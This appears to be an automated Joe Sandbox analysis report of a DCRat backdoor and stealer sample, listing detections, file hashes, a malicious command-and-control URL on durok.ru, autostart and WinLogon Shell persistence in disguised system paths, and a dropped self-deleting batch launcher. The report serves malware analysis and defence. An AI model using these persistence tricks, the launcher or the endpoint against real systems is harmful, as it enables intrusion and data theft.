                    C:\Users\user\Desktop\RbOZahUq.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\KInsUcJl.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\NPGqEfku.log | 100% | Joe Sandbox ML | |
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\CFoRreZv.log | 100% | Joe Sandbox ML | |
                    C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe | 63% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe | 63% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Users\user\Desktop\ADqcsYvZ.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\CFoRreZv.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\CNYkWNAB.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                    C:\Users\user\Desktop\DldKqVbv.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                    C:\Users\user\Desktop\GmHIOoGs.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\HkLrMVoC.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                    C:\Users\user\Desktop\HtvJqEPI.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\KInsUcJl.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\MgNITBew.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\MoHhbGed.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                    C:\Users\user\Desktop\NPGqEfku.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                    C:\Users\user\Desktop\OquQxqjY.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\PFcqhLrW.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\RbOZahUq.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\SYphwgjk.log | 29% | ReversingLabs | |
                    C:\Users\user\Desktop\UAeHorhP.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\WPgYDdje.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\YALoKruW.log | 4% | ReversingLabs | |
                    C:\Users\user\Desktop\ZeYGhBeG.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\bCyXfazS.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\dVPxoyeA.log | 4% | ReversingLabs | |
                    C:\Users\user\Desktop\eJTFZLay.log | 25% | ReversingLabs | |
                    C:\Users\user\Desktop\fxzonGoL.log | 17% | ReversingLabs | |
                    C:\Users\user\Desktop\hREwAhMk.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\hdUdukKE.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                    C:\Users\user\Desktop\klRmPCEz.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\lyXnXruh.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                    C:\Users\user\Desktop\oPsvdwHZ.log | 29% | ReversingLabs | |
                    C:\Users\user\Desktop\qmplAoJV.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                    C:\Users\user\Desktop\quZEfXkb.log | 12% | ReversingLabs | |
                    C:\Users\user\Desktop\rAXMkKSS.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\rMnteNPl.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\tWJuefum.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                    C:\Users\user\Desktop\uUlCzfJh.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\wNAllcuf.log | 12% | ReversingLabs | |
                    C:\Users\user\Desktop\wySLBGmi.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\xbtTyUdE.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\yKbtGcJa.log | 21% | ReversingLabs | |
                    C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe | 63% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Windows\GameBarPresenceWriter\services.exe | 63% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe | 63% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://www.w3. | 0% | Avira URL Cloud | safe |
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpWlc5QmNt | 0% | Avira URL Cloud | safe |
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php | 100% | Avira URL Cloud | malware |
                    http://durok.ru/ | 0% | Avira URL Cloud | safe |
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpQgKD | 0% | Avira URL Cloud | safe |
                    http://durok.ru | 0% | Avira URL Cloud | safe |
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php$ | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    durok.ru | 104.21.93.162 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php | true | Avira URL Cloud: malware | unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    104.21.93.162 | durok.ru | United States | | 13335 | CLOUDFLARENETUS | true
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1581018
                                                                                                          Start date and time:2024-12-26 17:16:07 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 11m 9s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:41
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:Z4D3XAZ2jB.exe
                                                                                                          renamed because original name is a hash value
                                                                                                          Original Sample Name:0a5d9cd0a4b6abdbb272262811774a8d.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@37/74@1/1
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 73.3%
                                                                                                          HCA Information:Failed
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.28.90.27, 13.107.246.63
                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target ZDtOzYsYYWKWEhNYzFc.exe, PID 7244 because it is empty
                                                                                                          • Execution Graph export aborted for target ZDtOzYsYYWKWEhNYzFc.exe, PID 7384 because it is empty
                                                                                                          • Execution Graph export aborted for target services.exe, PID 5296 because it is empty
                                                                                                          • Execution Graph export aborted for target services.exe, PID 7468 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:17:10 | API Interceptor | 1061294x Sleep call for process: services.exe modified
16:17:01 | Task Scheduler | Run new task: services path: "C:\Windows\GameBarPresenceWriter\services.exe"
16:17:01 | Task Scheduler | Run new task: servicess path: "C:\Windows\GameBarPresenceWriter\services.exe"
16:17:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Windows\GameBarPresenceWriter\services.exe"
16:17:02 | Task Scheduler | Run new task: ZDtOzYsYYWKWEhNYzFc path: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
16:17:02 | Task Scheduler | Run new task: ZDtOzYsYYWKWEhNYzFcZ path: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
16:17:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
16:17:17 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Windows\GameBarPresenceWriter\services.exe"
16:17:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
16:17:33 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run services "C:\Windows\GameBarPresenceWriter\services.exe"
16:17:41 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFc "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
16:17:58 | Autostart | Run: WinLogon Shell "C:\Windows\GameBarPresenceWriter\services.exe"
16:18:06 | Autostart | Run: WinLogon Shell "C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe"
16:18:15 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe"
16:18:23 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
16:18:31 | Autostart | Run: WinLogon Shell "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\ADqcsYvZ.log | 67VB5TS184.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | 4t8f8F3uT1.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | F3ePjP272h.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | cbCjTbodwa.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | vb8DOBZQ4X.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | 6G8OR42xrB.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | 8k1e14tjcx.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\ADqcsYvZ.log | gkcQYEdJSO.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (466), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):466
                                                                                                                              Entropy (8bit):5.862890432846636
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:jmGp/SJBK/0JYmWSjLw1hf18Q+ssKSRdNUiLt196n/H4U:yW/SJBY05jLwr18QTrQAn/YU
                                                                                                                              MD5:DE97C6B68239112E04623640D92F20F3
                                                                                                                              SHA1:FBAF697B269BF91AE56FB8593A62D3833559EFEA
                                                                                                                              SHA-256:002392B18CB51235E8D1A03C1AC2ACBD3D8E3B0B6632B08E158E52C06A8C7807
                                                                                                                              SHA-512:1CCD4E450E0F04130A563914A716E1EDB74BC200C472BD543D82EA3C2AC42C4AD6A06FE1532ED0368160B1F5C172F10CF62E93AF0991AE26792E4A70C06BAE9E
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (507), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):507
                                                                                                                              Entropy (8bit):5.875279671400233
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:1BMBUyuFaucBqZLexY7g84+Pg7ygyRn82MAwoHidJd4tdHL:rMBvuqsKY7njPgRAwoHidI1
                                                                                                                              MD5:7956B9F1EFD0F4D81B18B9DDC3F32F61
                                                                                                                              SHA1:213E111A366F92890B6E42254EDD7118F98BED65
                                                                                                                              SHA-256:AE267E50F3602869528BF95C7A5E1ECC5B0E7FB8D65684466DFB46E8311A0E88
                                                                                                                              SHA-512:EFF4BE6AB4BB776000EE2AD68FC3416B88BD4B8A6F84262FD10A5D88F85AC7B636DFA43DF3345EAF3A20952FBC7877244C72E981602F5E780952B55C11171582
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1830
                                                                                                                              Entropy (8bit):5.3661116947161815
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                                                                                                              MD5:4E98592551BD0B069F525D5145C4AB1D
                                                                                                                              SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                                                                                                              SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                                                                                                              SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                                                                                                              Malicious:true
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                              Process:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              File Type:CSV text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1281
                                                                                                                              Entropy (8bit):5.370111951859942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:CSV text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1281
                                                                                                                              Entropy (8bit):5.370111951859942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                              MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20480
                                                                                                                              Entropy (8bit):0.5707520969659783
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28672
                                                                                                                              Entropy (8bit):2.5793180405395284
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):106496
                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                              Malicious:false
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):245
                                                                                                                              Entropy (8bit):5.389148345240419
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:hCijTg3Nou1SV+DER5SMLeAQf8fbSKOZG1wkn23f3q:HTg9uYDEfSMEfObIfS
                                                                                                                              MD5:B7B6FF3BC3BC7C559B5F22417FD50208
                                                                                                                              SHA1:AC325AD5DC5697C4CB967C4E48834385EA0B43B8
                                                                                                                              SHA-256:B19588F5CA7C1C1AF17113A563482AD9195EAFA0C51E7E5847AAE922A6F602CF
                                                                                                                              SHA-512:8ED00ECA924C1B47B22A58C7E706A152A63EB7E5EF470315ECB965F9ABD12B59E91989DA67087533C00F88F4872FD614249201B28EB9A48C82D8294515FA6FCF
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\7aQ0YIT0mX.bat"
